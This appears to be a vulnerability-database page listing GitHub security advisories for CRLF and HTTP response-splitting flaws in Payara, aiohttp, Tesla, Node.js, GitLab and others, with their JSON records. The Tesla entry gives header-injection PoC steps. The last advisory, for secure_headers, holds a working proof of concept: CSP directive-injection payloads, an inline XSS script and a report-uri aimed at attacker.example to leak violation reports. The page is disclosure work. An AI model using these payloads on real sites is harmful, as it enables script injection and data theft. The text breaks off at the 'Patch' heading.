Common Weakness Enumeration

CWE-113

Allowed

Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')

Abstraction: Variant · Status: Incomplete

The product receives data from an HTTP agent/component (e.g., web server, proxy, browser, etc.), but it does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.

177 vulnerabilities reference this CWE, most recent first.

GHSA-MQH5-C2WX-V3PQ

Vulnerability from github – Published: 2025-01-21 18:31 – Updated: 2025-01-21 18:31
VLAI
Details

Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in Payara Platform Payara Server (Grizzly, REST Management Interface modules), Payara Platform Payara Micro (Grizzly modules) allows Manipulating State, Identity Spoofing.This issue affects Payara Server: from 4.1.151 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0; Payara Micro: from 4.1.152 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-45687"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-21T17:15:14Z",
    "severity": "LOW"
  },
  "details": "Improper Neutralization of CRLF Sequences in HTTP Headers (\u0027HTTP Request/Response Splitting\u0027) vulnerability in Payara Platform Payara Server (Grizzly, REST Management Interface modules), Payara Platform Payara Micro (Grizzly modules) allows Manipulating State, Identity Spoofing.This issue affects Payara Server: from 4.1.151 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0; Payara Micro: from 4.1.152 through 4.1.2.191.51, from 5.20.0 through 5.70.0, from 5.2020.2 through 5.2022.5, from 6.2022.1 through 6.2024.12, from 6.0.0 through 6.21.0.",
  "id": "GHSA-mqh5-c2wx-v3pq",
  "modified": "2025-01-21T18:31:07Z",
  "published": "2025-01-21T18:31:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45687"
    },
    {
      "type": "WEB",
      "url": "https://docs.payara.fish/community/docs/6.2025.1/Release%20Notes/Release%20Notes%206.2025.1.html"
    },
    {
      "type": "WEB",
      "url": "https://docs.payara.fish/enterprise/docs/5.71.0/Release%20Notes/Release%20Notes%205.71.0.html"
    },
    {
      "type": "WEB",
      "url": "https://docs.payara.fish/enterprise/docs/Release%20Notes/Release%20Notes%206.22.0.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-MWCJ-9FQH-RC64

Vulnerability from github – Published: 2022-05-14 02:03 – Updated: 2022-05-14 02:03
VLAI
Details

Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter, a related issue to CVE-2012-2943.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-16979"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-09-12T23:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter, a related issue to CVE-2012-2943.",
  "id": "GHSA-mwcj-9fqh-rc64",
  "modified": "2022-05-14T02:03:03Z",
  "published": "2022-05-14T02:03:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-16979"
    },
    {
      "type": "WEB",
      "url": "https://github.com/howchen/howchen/issues/4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MWH4-6H8G-PG8W

Vulnerability from github – Published: 2026-04-01 21:48 – Updated: 2026-04-01 21:48
VLAI
Summary
AIOHTTP has HTTP response splitting via \r in reason phrase
Details

Summary

An attacker who controls the reason parameter when creating a Response may be able to inject extra headers or similar exploits.

Impact

In the unlikely situation that an application allows untrusted data to be used in the response's reason parameter, then an attacker could manipulate the response to send something different from what the developer intended.


Patch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.13.3"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "aiohttp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.13.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34519"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T21:48:24Z",
    "nvd_published_at": "2026-04-01T21:17:00Z",
    "severity": "LOW"
  },
  "details": "### Summary\n\nAn attacker who controls the `reason` parameter when creating a `Response` may be able to inject extra headers or similar exploits.\n\n### Impact\n\nIn the unlikely situation that an application allows untrusted data to be used in the response\u0027s `reason` parameter, then an attacker could manipulate the response to send something different from what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b",
  "id": "GHSA-mwh4-6h8g-pg8w",
  "modified": "2026-04-01T21:48:24Z",
  "published": "2026-04-01T21:48:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34519"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/aio-libs/aiohttp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "AIOHTTP has HTTP response splitting via \\r in reason phrase"
}

GHSA-PFQJ-W6R6-G86V

Vulnerability from github – Published: 2025-03-27 18:01 – Updated: 2025-03-28 16:12
VLAI
Summary
Pitchfork HTTP Request/Response Splitting vulnerability
Details

Impact

HTTP Response Header Injection in Pitchfork Versions < 0.11.0 when used in conjunction with Rack 3

Patches

The issue was fixed in Pitchfork release 0.11.0

Workarounds

There are no known work arounds. Users must upgrade.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "pitchfork"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-30221"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-27T18:01:18Z",
    "nvd_published_at": "2025-03-27T15:16:02Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nHTTP Response Header Injection in Pitchfork Versions \u003c 0.11.0 when used in conjunction with Rack 3\n\n### Patches\nThe issue was fixed in Pitchfork release 0.11.0\n\n### Workarounds\nThere are no known work arounds. Users must upgrade.",
  "id": "GHSA-pfqj-w6r6-g86v",
  "modified": "2025-03-28T16:12:43Z",
  "published": "2025-03-27T18:01:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Shopify/pitchfork/security/advisories/GHSA-pfqj-w6r6-g86v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30221"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Shopify/pitchfork/commit/17ed9b61bf9f58957065f7405b66102daf86bf55"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Shopify/pitchfork"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/pitchfork/CVE-2025-30221.yml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Pitchfork HTTP Request/Response Splitting vulnerability"
}

GHSA-Q7JX-V53G-848W

Vulnerability from github – Published: 2026-07-10 00:03 – Updated: 2026-07-10 00:03
VLAI
Summary
Tesla has CRLF injection in request `Content-Type` header via `add_content_type_param`
Details

Summary

Tesla.Multipart.add_content_type_param/2 appends caller-supplied strings to the multipart Content-Type header with no validation. A param value containing \r\n splits the header line, allowing an attacker who controls any content-type parameter (charset, boundary parameter, etc.) to inject arbitrary headers into the outbound HTTP request.

Details

add_content_type_param/2 in lib/tesla/multipart.ex stores the supplied string directly in multipart.content_type_params without any CR/LF check. headers/1 then joins all params with "; " and appends the result verbatim to the Content-Type header value. Because HTTP headers are delimited by \r\n, a param containing that sequence breaks out of the header field and introduces new header lines before the adapter writes the request to the socket.

The precondition is that untrusted input reaches add_content_type_param/2, which is the normal pattern for applications that accept user-supplied charset values, file type parameters, or any other content-type extension fields.

PoC

  1. Call Tesla.Multipart.add_content_type_param/2 with a value containing \r\nX-Injected: pwned.
  2. Pass the resulting Multipart struct as the request body via any Tesla adapter.
  3. The raw request on the wire contains X-Injected: pwned as a standalone header line.

Impact

Low severity (CVSS v4.0: 2.1). Any application using tesla 0.8.0 through 1.18.2 that passes untrusted input into Tesla.Multipart.add_content_type_param/2 is affected. Consequences range from forging arbitrary outbound request headers to potential request smuggling against the upstream server. Fixed in tesla 1.18.3.

Workarounds

Validate content-type parameter strings before passing them to Tesla.Multipart.add_content_type_param/2, rejecting any value that contains \r or \n.

Reesources

  • Introduction commit: https://github.com/elixir-tesla/tesla/commit/6ebfdb9abe9c6f119408045b933d82462decd351
  • Patch commit: https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Hex",
        "name": "tesla"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.8.0"
            },
            {
              "fixed": "1.18.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48596"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113",
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-10T00:03:12Z",
    "nvd_published_at": "2026-06-02T20:16:38Z",
    "severity": "LOW"
  },
  "details": "### Summary\n\n`Tesla.Multipart.add_content_type_param/2` appends caller-supplied strings to the multipart `Content-Type` header with no validation. A param value containing `\\r\\n` splits the header line, allowing an attacker who controls any content-type parameter (charset, boundary parameter, etc.) to inject arbitrary headers into the outbound HTTP request.\n\n### Details\n\n`add_content_type_param/2` in `lib/tesla/multipart.ex` stores the supplied string directly in `multipart.content_type_params` without any CR/LF check. `headers/1` then joins all params with `\"; \"` and appends the result verbatim to the `Content-Type` header value. Because HTTP headers are delimited by `\\r\\n`, a param containing that sequence breaks out of the header field and introduces new header lines before the adapter writes the request to the socket.\n\nThe precondition is that untrusted input reaches `add_content_type_param/2`, which is the normal pattern for applications that accept user-supplied charset values, file type parameters, or any other content-type extension fields.\n\n### PoC\n\n1. Call `Tesla.Multipart.add_content_type_param/2` with a value containing `\\r\\nX-Injected: pwned`.\n2. Pass the resulting `Multipart` struct as the request body via any Tesla adapter.\n3. The raw request on the wire contains `X-Injected: pwned` as a standalone header line.\n\n### Impact\n\nLow severity (CVSS v4.0: 2.1). Any application using `tesla` 0.8.0 through 1.18.2 that passes untrusted input into `Tesla.Multipart.add_content_type_param/2` is affected. Consequences range from forging arbitrary outbound request headers to potential request smuggling against the upstream server. Fixed in tesla 1.18.3.\n\n### Workarounds\n\nValidate content-type parameter strings before passing them to `Tesla.Multipart.add_content_type_param/2`, rejecting any value that contains `\\r` or `\\n`.\n\n### Reesources\n\n* Introduction commit: https://github.com/elixir-tesla/tesla/commit/6ebfdb9abe9c6f119408045b933d82462decd351\n* Patch commit: https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2",
  "id": "GHSA-q7jx-v53g-848w",
  "modified": "2026-07-10T00:03:12Z",
  "published": "2026-07-10T00:03:12Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/elixir-tesla/tesla/security/advisories/GHSA-q7jx-v53g-848w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48596"
    },
    {
      "type": "WEB",
      "url": "https://github.com/elixir-tesla/tesla/commit/23601edac5d22ba9407b427967b5bdbda201aec2"
    },
    {
      "type": "WEB",
      "url": "https://cna.erlef.org/cves/CVE-2026-48596.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/elixir-tesla/tesla"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/EEF-CVE-2026-48596"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Tesla has CRLF injection in request `Content-Type` header via `add_content_type_param`"
}

GHSA-QCM3-7879-XCWW

Vulnerability from github – Published: 2024-08-15 21:46 – Updated: 2024-09-30 19:48
VLAI
Summary
Gateway API route matching order contradicts specification
Details

Impact

Gateway API HTTPRoutes and GRPCRoutes do not follow the match precedence specified in the Gateway API specification. In particular, request headers are matched before request methods, when the specification describes that the request methods must be respected before headers are matched (HTTPRouteRule, GRPCRouteRule).

If users create Gateway API resources that use both request headers and request methods in order to route to different destinations, then traffic may be delivered to the incorrect backend. If the backend does not have Network Policy restricting acceptable traffic to receive, then requests may access information that you did not intend for them to access.

Patches

This issue was fixed in https://github.com/cilium/cilium/pull/34109.

This issue affects: - Cilium v1.15 between v1.15.0 and v1.15.7 inclusive - Cilium v1.16.0

This issue is fixed in: - Cilium v1.15.8 - Cilium v1.16.1

Workarounds

There is no workaround for this issue.

Acknowledgements

The Cilium community has worked together with members of Cure53 and Isovalent to prepare these mitigations. Special thanks to @sayboras for remediating this issue.

Further information

If you have any questions or comments about this advisory, please reach out on Slack.

If you think you have found a vulnerability affecting Cilium, we strongly encourage you to report it to our security mailing list at security@cilium.io. This is a private mailing list for the Cilium security team, and your report will be treated as top priority.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cilium/cilium"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.16.0"
            },
            {
              "fixed": "1.16.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.16.0"
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cilium/cilium"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.15.0"
            },
            {
              "fixed": "1.15.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-42487"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113",
      "CWE-436"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-15T21:46:46Z",
    "nvd_published_at": "2024-08-15T21:15:16Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nGateway API HTTPRoutes and GRPCRoutes do not follow the match precedence specified in the Gateway API specification. In particular, request headers are matched before request methods, when the specification describes that the request methods must be respected before headers are matched ([HTTPRouteRule](https://gateway-api.sigs.k8s.io/reference/spec/#gateway.networking.k8s.io/v1.HTTPRouteRule), [GRPCRouteRule](https://gateway-api.sigs.k8s.io/reference/spec/#gateway.networking.k8s.io%2fv1.GRPCRouteRule)).\n\nIf users create Gateway API resources that use both request headers and request methods in order to route to different destinations, then traffic may be delivered to the incorrect backend. If the backend does not have Network Policy restricting acceptable traffic to receive, then requests may access information that you did not intend for them to access.\n\n### Patches\n\nThis issue was fixed in https://github.com/cilium/cilium/pull/34109.\n\nThis issue affects:\n- Cilium v1.15 between v1.15.0 and v1.15.7 inclusive\n- Cilium v1.16.0\n\nThis issue is fixed in:\n- Cilium v1.15.8\n- Cilium v1.16.1\n\n### Workarounds\n\nThere is no workaround for this issue.\n\n### Acknowledgements\n\nThe Cilium community has worked together with members of Cure53 and Isovalent to prepare these mitigations. Special thanks to @sayboras for remediating this issue.\n\n### Further information\n\nIf you have any questions or comments about this advisory, please reach out on [Slack](https://docs.cilium.io/en/latest/community/community/#slack).\n\nIf you think you have found a vulnerability affecting Cilium, we strongly encourage you to report it to our security mailing list at [security@cilium.io](mailto:security@cilium.io). This is a private mailing list for the Cilium security team, and your report will be treated as top priority.\n",
  "id": "GHSA-qcm3-7879-xcww",
  "modified": "2024-09-30T19:48:17Z",
  "published": "2024-08-15T21:46:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cilium/cilium/security/advisories/GHSA-qcm3-7879-xcww"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42487"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cilium/cilium/pull/34109"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cilium/cilium/commit/a3510fe4a92305822aa1a5e08cb6d6c873c8699a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cilium/cilium/commit/d88772b9c29e370becbc4547cada6711d51edcde"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cilium/cilium/commit/fe42273566a943a0f3174c87b23a195c856b51d6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cilium/cilium"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Gateway API route matching order contradicts specification"
}

GHSA-QPF8-FQRF-8P2H

Vulnerability from github – Published: 2022-05-14 03:56 – Updated: 2025-04-12 13:05
VLAI
Details

CRLF injection vulnerability in the ServerResponse#writeHead function in Node.js 0.10.x before 0.10.47, 0.12.x before 0.12.16, 4.x before 4.6.0, and 6.x before 6.7.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the reason argument.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-5325"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2016-10-10T16:59:00Z",
    "severity": "MODERATE"
  },
  "details": "CRLF injection vulnerability in the ServerResponse#writeHead function in Node.js 0.10.x before 0.10.47, 0.12.x before 0.12.16, 4.x before 4.6.0, and 6.x before 6.7.0 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via the reason argument.",
  "id": "GHSA-qpf8-fqrf-8p2h",
  "modified": "2025-04-12T13:05:21Z",
  "published": "2022-05-14T03:56:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5325"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/node/commit/c0f13e56a20f9bde5a67d873a7f9564487160762"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2016:2101"
    },
    {
      "type": "WEB",
      "url": "https://nodejs.org/en/blog/vulnerability/september-2016-security-releases"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201612-43"
    },
    {
      "type": "WEB",
      "url": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html"
    },
    {
      "type": "WEB",
      "url": "http://rhn.redhat.com/errata/RHSA-2017-0002.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/93483"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QX55-2CP2-7PPQ

Vulnerability from github – Published: 2023-06-07 18:30 – Updated: 2024-04-04 04:39
VLAI
Details

An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2. Open redirection was possible via HTTP response splitting in the NPM package API.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-0508"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-113"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-07T17:15:09Z",
    "severity": "MODERATE"
  },
  "details": "An issue has been discovered in GitLab CE/EE affecting all versions starting from 15.4 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2. Open redirection was possible via HTTP response splitting in the NPM package API.",
  "id": "GHSA-qx55-2cp2-7ppq",
  "modified": "2024-04-04T04:39:35Z",
  "published": "2023-06-07T18:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0508"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1842314"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-0508.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/389328"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-RQQ5-2GF9-4W4Q

Vulnerability from github – Published: 2026-07-10 20:37 – Updated: 2026-07-10 20:37
VLAI
Summary
Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when given untrusted input
Details

Summary

secure_headers builds the Content-Security-Policy value by stitching every configured directive together with ; separators. Three directive builders (build_sandbox_list_directive, build_media_type_list_directive, build_report_to_directive) interpolate caller-supplied strings into that value without scrubbing ;, \r, or \n.

When an application forwards untrusted input into SecureHeaders.override_content_security_policy_directives (or append_…) for :sandbox, :plugin_types, or :report_to, an attacker can embed a literal ; and inject an arbitrary CSP directive into the header value. Because :sandbox and :plugin_types both sort alphabetically before :script_src in BODY_DIRECTIVES, the injected script-src lands earlier in the header and wins under the CSP first-occurrence rule, defeating the application's real script-src. End result: an 'unsafe-inline' * policy is forced for inline <script> despite the configured strict CSP, giving full XSS reachability anywhere reflected or stored content meets one of these three sinks.

An existing ;/\n scrub is already present in the source-list builder (build_source_list_directive), but the three sibling builders here never received the same treatment and still emit caller bytes verbatim into the CSP value.

Impact

Although piping untrusted input into CSP directives is generally discouraged, applications that do so for one of the three uncovered directives turn that endpoint into an XSS sink with an effective * 'unsafe-inline' script-src, even though the global config says script_src: %w('self'). The same primitive can also be used to point report-to / report-uri at attacker infrastructure to silently siphon CSP violation reports — which include the violated URL, blocked-uri, source-file, line-number and a sample-snippet, useful for fingerprinting and for harvesting victim-internal URLs.

The global default CSP set in Configuration.default is supposed to be a backstop: even if a controller appends a single risky value, the strict script-src should remain the first match. This bug breaks that property by letting the appended value redefine the policy header upstream of the legitimate script-src.

Affected

  • Package: secure_headers (RubyGems)
  • Vulnerable versions: <= 7.2.0
  • Patched version: 7.3.0

Applications that set :sandbox, :plugin_types, or :report_to only from static configuration (no per-request or per-tenant input) are not exploitable and need only the version bump. Applications that pipe any user-controlled value into one of those three directives via the per-controller override APIs are exploitable and should both upgrade and audit those code paths.

Mitigations / Workarounds

Until upgrading to 7.3.0, sanitize any user-controlled input before passing it to:

  • SecureHeaders.override_content_security_policy_directives
  • SecureHeaders.append_content_security_policy_directives
  • SecureHeaders.use_content_security_policy_named_append

for :sandbox, :plugin_types, or :report_to. Reject or strip ;, \r, and \n from values destined for these directives before they reach the gem.

Vulnerable code

Three sibling builders all join an attacker-controllable value into the CSP header value with no ; / \r / \n scrubbing.

elsif sandbox_list && sandbox_list.any?
  [
    symbol_to_hyphen_case(directive),
    sandbox_list.uniq
  ].join(" ")
end
def build_report_to_directive(directive)
  return unless endpoint_name = @config.directive_value(directive)
  if endpoint_name && endpoint_name.is_a?(String) && !endpoint_name.empty?
    [symbol_to_hyphen_case(directive), endpoint_name].join(" ")
  end
end

For comparison, content_security_policy.rb#L117-L129 shows the source-list builder that already performs the scrub the three above are missing.

Validation also does not catch it:

  • policy_management.rb#L361-L371validate_sandbox_expression! only checks v.start_with?("allow-"), so "allow-scripts allow-same-origin; script-src 'unsafe-inline' *" passes.
  • policy_management.rb#L376-L385validate_media_type_expression! uses /\A.+\/.+\z/; . matches ; and ', so "application/x-foo; script-src 'unsafe-inline' *" passes.
  • policy_management.rb#L410-L417validate_report_to_endpoint_expression! only checks String + non-empty.

Reachable

The three sinks are reached by the documented public override APIs in lib/secure_headers.rb#L61-L106override_content_security_policy_directives, append_content_security_policy_directives, and use_content_security_policy_named_append. These are the documented per-controller hooks Rails apps use to vary CSP per request (e.g. allowing an iframe domain that a user just configured, sandboxing a per-tenant subdocument, or wiring up a per-tenant reporting endpoint).

Concrete reachable shapes:

  1. Multi-tenant SaaS persisting a tenant-chosen iframe sandbox policy and replaying it via override_content_security_policy_directives(sandbox: [tenant.sandbox_tokens]).
  2. Document / PDF viewer that allows tenants to whitelist a custom MIME via plugin_types: [tenant.allowed_mime].
  3. Reporting integration that lets the operator name the active reporting group through an admin UI and forwards it via report_to: params[:report_group].

In all three patterns, a string field that the app expects to be a single token (allow-forms, application/pdf, default) is the injection point.

Proof of concept

Pinned reproduction against a minimal Rack app on secure_headers 7.2.0, rack 3.2.6, rackup 2.3.1, webrick 1.9.2. Browser verification uses headless Chromium.

Install (Bundler):

# Gemfile
source "https://rubygems.org"
gem "secure_headers", "= 7.2.0"
gem "rack",           "= 3.2.6"
gem "rackup",         "= 2.3.1"
gem "webrick", "= 1.9.2"
bundle install

Driver (poc_e2e.rb):

require "rack"
require "webrick"
require "rackup"
require "rackup/handler/webrick"
require "secure_headers"

SecureHeaders::Configuration.default do |c|
  c.csp = {default_src: %w('self'), script_src: %w('self'), style_src: %w('self')}
end

INLINE_XSS = "<script>document.body.appendChild(Object.assign(" \
             "document.createElement('div'),{id:'pwn',innerText:" \
             "'XSS-EXECUTED via '+location.pathname}));</script>"

class App
  def call(env)
    req = Rack::Request.new(env)
    case req.path_info
    when "/sandbox"  # Vector A
      SecureHeaders.override_content_security_policy_directives(req,
        sandbox: ["allow-scripts allow-same-origin; script-src 'unsafe-inline' *"])
    when "/plugin"   # Vector B
      SecureHeaders.override_content_security_policy_directives(req,
        plugin_types: ["application/x-foo; script-src 'unsafe-inline' *"])
    when "/report"   # Vector C (report-uri exfil)
      SecureHeaders.override_content_security_policy_directives(req,
        report_to: "default; report-uri https://attacker.example/leak")
    when "/control"  # Negative — same payload on a source_list directive
      SecureHeaders.override_content_security_policy_directives(req,
        frame_src: ["'self'", "evil.example; script-src 'unsafe-inline' *"])
    end
    body = "<!doctype html>#{INLINE_XSS}"
    [200, {"content-type"=>"text/html"}.merge(SecureHeaders.header_hash_for(req)), [body]]
  end
end

Rackup::Handler::WEBrick.run(
  Rack::Builder.new { use SecureHeaders::Middleware; run App.new },
  Host: "127.0.0.1", Port: 14567, AccessLog: [], Logger: WEBrick::Log.new(nil, 0))

Run:

bundle exec ruby poc_e2e.rb

End-to-end reproduction against secure_headers 7.2.0

Server-side observation (curl -s -D - http://127.0.0.1:14567/<path>):

GET /sandbox  -> content-security-policy:
    default-src 'self'; sandbox allow-scripts allow-same-origin;
    script-src 'unsafe-inline' *; script-src 'self'; style-src 'self'

GET /plugin   -> content-security-policy:
    default-src 'self'; plugin-types application/x-foo;
    script-src 'unsafe-inline' *; script-src 'self'; style-src 'self'

GET /report   -> content-security-policy:
    default-src 'self'; script-src 'self'; style-src 'self';
    report-to default; report-uri https://attacker.example/leak

GET /control  -> content-security-policy:
    default-src 'self'; frame-src 'self' evil.example  script-src
    'unsafe-inline' *; script-src 'self'; style-src 'self'

Browser verification (headless Chromium, --dump-dom, grep for the injected id="pwn" element which is only present if the inline <script> actually ran):

GET /sandbox  -> pwn element PRESENT  (XSS executed, injected script-src wins)
GET /plugin   -> pwn element PRESENT  (XSS executed, injected script-src wins)
GET /report   -> pwn element absent   (this vector enables report-uri exfil,
                                       not script execution by itself)
GET /control  -> pwn element absent   (existing scrub on the source-list
                                       builder rewrites ; -> space, so the
                                       legitimate `script-src 'self'` is
                                       still the first match)

Patched-build verification: applying the patch and re-running the same three vectors flips /sandbox and /plugin to "pwn element absent". The injected ; is replaced with a space, so the trailing script-src 'unsafe-inline' * collapses into the parent directive's value list instead of becoming a sibling directive, and the legitimate script-src 'self' stays the first script-src the parser encounters.

Patch

